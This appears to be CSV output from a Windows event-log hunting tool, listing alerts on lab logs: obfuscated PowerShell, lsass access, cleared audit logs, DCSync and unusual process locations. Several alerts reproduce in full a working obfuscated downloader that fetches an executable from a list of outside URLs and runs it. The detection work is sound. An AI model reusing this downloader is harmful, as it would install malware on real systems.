neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt"
",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 
.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
800
0
4
8
0
0x80000000000000
792
Windows PowerShell
DESKTOP-RIPCLIP
$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
DetailTotal=1
SequenceNumber=33
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item"
ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"
",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 
.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
800
0
4
8
0
0x80000000000000
786
Windows PowerShell
DESKTOP-RIPCLIP
$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
DetailTotal=1
SequenceNumber=21
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item"
ParameterBinding(New-Item): name="ItemType"; value="DIrectOry"
ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\"
",DESKTOP-RIPCLIP,Windows PowerShell
non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) obtained access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663,"
4663
1
0
12802
0
0x8020000000000000
314462
Security
MSEDGEWIN10
S-1-5-21-3461203602-4096304019-2269080069-1000
IEUser
MSEDGEWIN10
0x33392
Security
Process
\Device\HarddiskVolume1\Windows\System32\lsass.exe
0x558
%%4484
0x10
0x1688
C:\Windows\System32\cscript.exe
-
",MSEDGEWIN10,Security
non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) obtained access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656,"
4656
1
0
12802
0
0x8020000000000000
314461
Security
MSEDGEWIN10
S-1-5-21-3461203602-4096304019-2269080069-1000
IEUser
MSEDGEWIN10
0x33392
Security
Process
\Device\HarddiskVolume1\Windows\System32\lsass.exe
0x558
00000000-0000-0000-0000-000000000000
%%1537
%%1538
%%1539
%%1540
%%1541
%%4480
%%4481
%%4482
%%4483
%%4484
%%4485
%%4486
%%4487
%%4488
%%4489
%%4490
%%4491
%%4492
%%4493
-
0x1f3fff
-
0
0x1688
C:\Windows\System32\cscript.exe
-
",MSEDGEWIN10,Security
Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
1102
0
4
104
0
0x4020000000000000
4987
Security
IEWIN7
S-1-5-21-3583694148-1414552638-2922671848-1000
IEUser
IEWIN7
0xffa8
",IEWIN7,Security
Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
768617
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x4c331
",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected of performing a DCSync attack,4662,"
4662
0
0
14080
0
0x8020000000000000
202793
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-500
Administrator
insecurebank
0x40c6511
DS
%{19195a5b-6da0-11d0-afd3-00c04fd930c9}
%{c6faf700-bfe4-452a-a766-424f84c29583}
Object Access
0x0
%%7688
0x100
%%7688
{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
-
",DC1.insecurebank.local,Security
Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected of performing a DCSync attack,4662,"
4662
0
0
14080
0
0x8020000000000000
202792
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-500
Administrator
insecurebank
0x40c6511
DS
%{19195a5b-6da0-11d0-afd3-00c04fd930c9}
%{c6faf700-bfe4-452a-a766-424f84c29583}
Object Access
0x0
%%7688
0x100
%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
-
",DC1.insecurebank.local,Security
Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
769792
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x4c331
",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected of performing a DCSync attack,4662,"
4662
0
0
14080
0
0x8020000000000000
202791
Security
DC1.insecurebank.local
S-1-5-21-738609754-2819869699-4189121830-500
Administrator
insecurebank
0x40c6511
DS
%{19195a5b-6da0-11d0-afd3-00c04fd930c9}
%{c6faf700-bfe4-452a-a766-424f84c29583}
Object Access
0x0
%%7688
0x100
%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
-
",DC1.insecurebank.local,Security
Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
887106
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x3a17a
",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) ran from an unusual location , check the number and date of executions in the process execution report",4688,"
4688
2
0
13312
0
0x8020000000000000
329919
Security
MSEDGEWIN10
S-1-5-18
MSEDGEWIN10$
WORKGROUP
0x3e7
0x17b8
\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
%%1936
0x27c
S-1-0-0
IEUser
MSEDGEWIN10
0x16e3db3
C:\Windows\System32\lsass.exe
S-1-16-12288
",MSEDGEWIN10,Security
schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,scheduled task updated by user,4702,"
4702
0
0
12804
0
0x8020000000000000
198239223
Security
DC1.insecurebank.local
S-1-5-20
DC1$
insecurebank
0x3e4
\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Source>$(@%systemroot%\system32\sppc.dll,-200)</Source>
<Author>$(@%systemroot%\system32\sppc.dll,-200)</Author>
<Version>1.0</Version>
<Description>$(@%systemroot%\system32\sppc.dll,-201)</Description>
<URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI>
<SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2019-03-26T12:51:45Z</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="NetworkService">
<UserId>S-1-5-20</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="NetworkService">
<ComHandler>
<ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>
<Data><![CDATA[timer]]></Data>
</ComHandler>
</Actions>
</Task>
",DC1.insecurebank.local,Security
Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
2988521
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1105
jbrown
3B
0x1717b6
",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"
4720
0
0
13824
0
0x8020000000000000
769634
Security
01566s-win16-ir.threebeesco.com
$
3B
S-1-5-21-308926384-506822093-3341789130-107104
S-1-5-18
01566S-WIN16-IR$
3B
0x3e7
-
$
%%1793
-
%%1793
%%1793
%%1793
%%1793
%%1793
%%1794
%%1794
513
-
0x0
0x15
%%2080
%%2082
%%2084
%%1792
-
%%1793
",01566s-win16-ir.threebeesco.com,Security
User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"
4720
0
0
13824
0
0x8020000000000000
769629
Security
01566s-win16-ir.threebeesco.com
$
3B
S-1-5-21-308926384-506822093-3341789130-107103
S-1-5-18
01566S-WIN16-IR$
3B
0x3e7
-
$
%%1793
-
%%1793
%%1793
%%1793
%%1793
%%1793
%%1794
%%1794
513
-
0x0
0x15
%%2080
%%2082
%%2084
%%1792
-
%%1793
",01566s-win16-ir.threebeesco.com,Security
